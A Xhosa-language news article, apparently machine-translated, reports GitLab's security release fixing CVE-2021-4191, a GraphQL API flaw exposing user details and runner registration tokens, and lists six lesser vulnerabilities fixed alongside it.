Kulungiswe ubuthathaka kwi-GitLab evumela ufikelelo kwiithokheni zoMbaleki

Darkcrizt

Imizuzu ye4

iintsuku ezininzi ezidlulileyo I-GitLab yatyhilwa ngeposti yebhlog ukuba abaphandi batyhile i iinkcukacha zokuba sesichengeni ukhuseleko ngoku olufakwe kwi-GitLab, isoftware ye-DevOps evulekileyo, enokuvumela umhlaseli okude ongavunywanga ukuba afumane ulwazi olunxulumene nomsebenzisi.

Ubuthathaka obuphambili, obusele bukhona ibhaliswe njenge-CVE-2021-4191, kubalelwa kwisiphene sobungqongqo obuphakathi esichaphazela zonke iinguqulelo zoHlelo loLuntu lweGitLab kunye noHlelo loShishino ukususela ngo-13.0 kunye nazo zonke iinguqulelo ukusuka kwi-14.4 nangaphambi kwe-14.8.

YayinguJake Baines, umphandi ophezulu kwezokhuseleko e-Rapid7, onikwe imbeko ngokufumanisa kunye nokuxela isiphene, owathi emva kokubhengezwa okunoxanduva ngoNovemba 18, 2021, wakhulula izilungiso njengenxalenye yokhupho olubalulekileyo lwezokhuseleko ukusuka kwi-GitLab 14.8.2, 14.7.4. 14.6.5 kunye XNUMX apho inokuvumela umsebenzisi ongagunyaziswanga ukuba embe iithokheni zobhaliso kwiGitLab Runner, esetyenziselwa ukulungelelanisa abaphathi befowuni xa usenza ikhowudi yeprojekthi kwinkqubo yokudibanisa eqhubekayo.

"Ubuthathaka sisiphumo sokungajongi ubunyani bokungabikho xa usenza izicelo ezithile ze-GitLab GraphQL API," utshilo uBaines. ekhankanywe kwingxelo ekhutshwe ngoLwesine. "Umhlaseli okude ongagunyaziswanga unokusebenzisa obu buthathaka ukuvuna amagama abhalisiweyo e-GitLab, amagama kunye needilesi ze-imeyile."

Ukongeza, kukhankanyiwe ukuba usebenzisa i-Kubernetes executors, kufuneka uhlaziye amaxabiso etshathi yeHelm. ngophawu olutsha lobhaliso. 

Kwaye kwiimeko ezizilawulayo ezingekho kwiinguqulelo 14.6 okanye kamva, iGitLab ine iipetshi eziposiweyo enokuthi isetyenziswe ukuthomalalisa ukubhengezwa kophawu lobhaliso loMbaleki ngokuba sesichengeni yezenzo ezikhawulezayo  La mabala kufuneka athathwe njengethutyana. Nawuphi na umzekelo we-GitLab kufuneka ihlaziywe ibe kuguqulelo oluzilayiweyo lwe-14.8.2, 14.7.4, okanye 14.6.5 ngokukhawuleza.

Ukuphumelela ukuvuza kwe-API inokuvumela abadlali abakhohlakeleyo ukuba babale kwaye baqulunqe uluhlu lwamagama abasebenzisi asemthethweni ojoliswe kuwo. enokuthi ke isetyenziswe njengentlahlela ukwenza uhlaselo olungenalusini, ukuquka ukuqikelela igama eliyimfihlo, ukutshiza ngegama eliyimfihlo, kunye nokufaka iinkcukacha.

"Ulwazi oluvuzayo lukwavumela umhlaseli ukuba enze uluhlu lwamagama olutsha olusekwe kufakelo lweGitLab, kungekuphela nje kwi-gitlab.com kodwa nakwi-50,000 yezinye iimeko zeGitLab ezifumaneka kwi-Intanethi."

Kuyacetyiswa kubasebenzisi abagcina owabo ufakelo lweGitLab ukufakela uhlaziyo okanye ukusebenzisa isiziba ngokukhawuleza. Lo mba walungiswa ngokushiya ukufikelela kwimiyalelo yezenzo ezikhawulezayo kuphela kubasebenzisi abanemvume yokuBhala.

Emva kokufaka uhlaziyo okanye iipatches "token-prefix" zomntu, iithokheni zokubhalisa ezenziwe ngaphambili zamaqela kunye neeprojekthi kwi-Runner ziya kuphinda zisetyenziswe kwaye zihlaziywe.

Ukongeza kumngcipheko obalulekileyo, iinguqulelo ezintsha ezikhutshiweyo zikwabandakanya ukulungiswa kubuthathaka obungaphantsi kobungozi obu-6:

  • Uhlaselo lweDoS ngenkqubo yokungeniswa kwengxelo: umba kwi-GitLab CE/EE ochaphazela zonke iinguqulelo eziqala nge-8.15. Kwakunokwenzeka ukwenza i-DOS isebenze ngokusebenzisa umsebenzi wezibalo kunye nefomula ethile kwimibono yengxaki.
  • Ukongeza abanye abasebenzisi kumaqela ngumsebenzisi ongenalungelo: echaphazela zonke iinguqulelo phambi 14.3.6, zonke iinguqulelo ukusuka 14.4 phambi 14.4.4, zonke iinguqulelo ukusuka 14.5 phambi 14.5.2. Phantsi kweemeko ezithile, iGitLab REST API inokuvumela abasebenzisi abangenalungelo ukuba bongeze abanye abasebenzisi kumaqela, nokuba oko akunakwenzeka nge-UI yewebhu.
  • Ulwazi olungelulo lwabasebenzisi ngokukhohlisa umxholo weZiqwengana: ivumela umdlali ongagunyaziswanga ukuba enze iziqwengana ezinomxholo okhohlisayo, onokuqhatha abasebenzisi abangalindelanga ukuba baphumeze imiyalelo engafanelekanga.
  • Ukuvuza kwezinto eziguquguqukayo zemo engqongileyo kusetyenziswa indlela yonikezelo ye-"sendmail": Ukuqinisekiswa kwegalelo elingalunganga kuzo zonke iinguqulelo zeGitLab CE/EE usebenzisa i-imeyile ukuthumela ii-imeyile kuvumele umdlali ongagunyaziswanga ukuba ebe izinto eziguquguqukayo zemekobume ngeedilesi ze-imeyile ezenziwe ngokukodwa.
  • Ukumisela ubukho bomsebenzisi ngeGraphQL API: Izehlo zeGitLab zabucala ezinobhaliso oluthintelweyo zinokuba sesichengeni ekubalweni kwabasebenzisi ngabasebenzisi abangagunyaziswanga ngeGraphQL API.
  • ukuvuza kwegama lokugqitha xa ujonga indawo zokugcina nge-SSH kwimowudi yokutsala 

Gqibela ukuba unomdla wokwazi okungakumbi ngayo, ungazijonga iinkcukacha kwi ukulandela ikhonkco.


Shiya uluvo lwakho

Idilesi yakho ye email aziyi kupapashwa. ezidingekayo ziphawulwe *

*

*

  1. Inoxanduva lwedatha: I-AB Internet Networks 2008 SL
  2. Injongo yedatha: Ulawulo lwe-SPAM, ulawulo lwezimvo.
  3. Umthetho: Imvume yakho
  4. Unxibelelwano lwedatha: Idatha ayizukuhanjiswa kubantu besithathu ngaphandle koxanduva lomthetho.
  5. Ukugcinwa kweenkcukacha
  6. Amalungelo: Ngalo naliphi na ixesha unganciphisa, uphinde uphinde ucime ulwazi lwakho.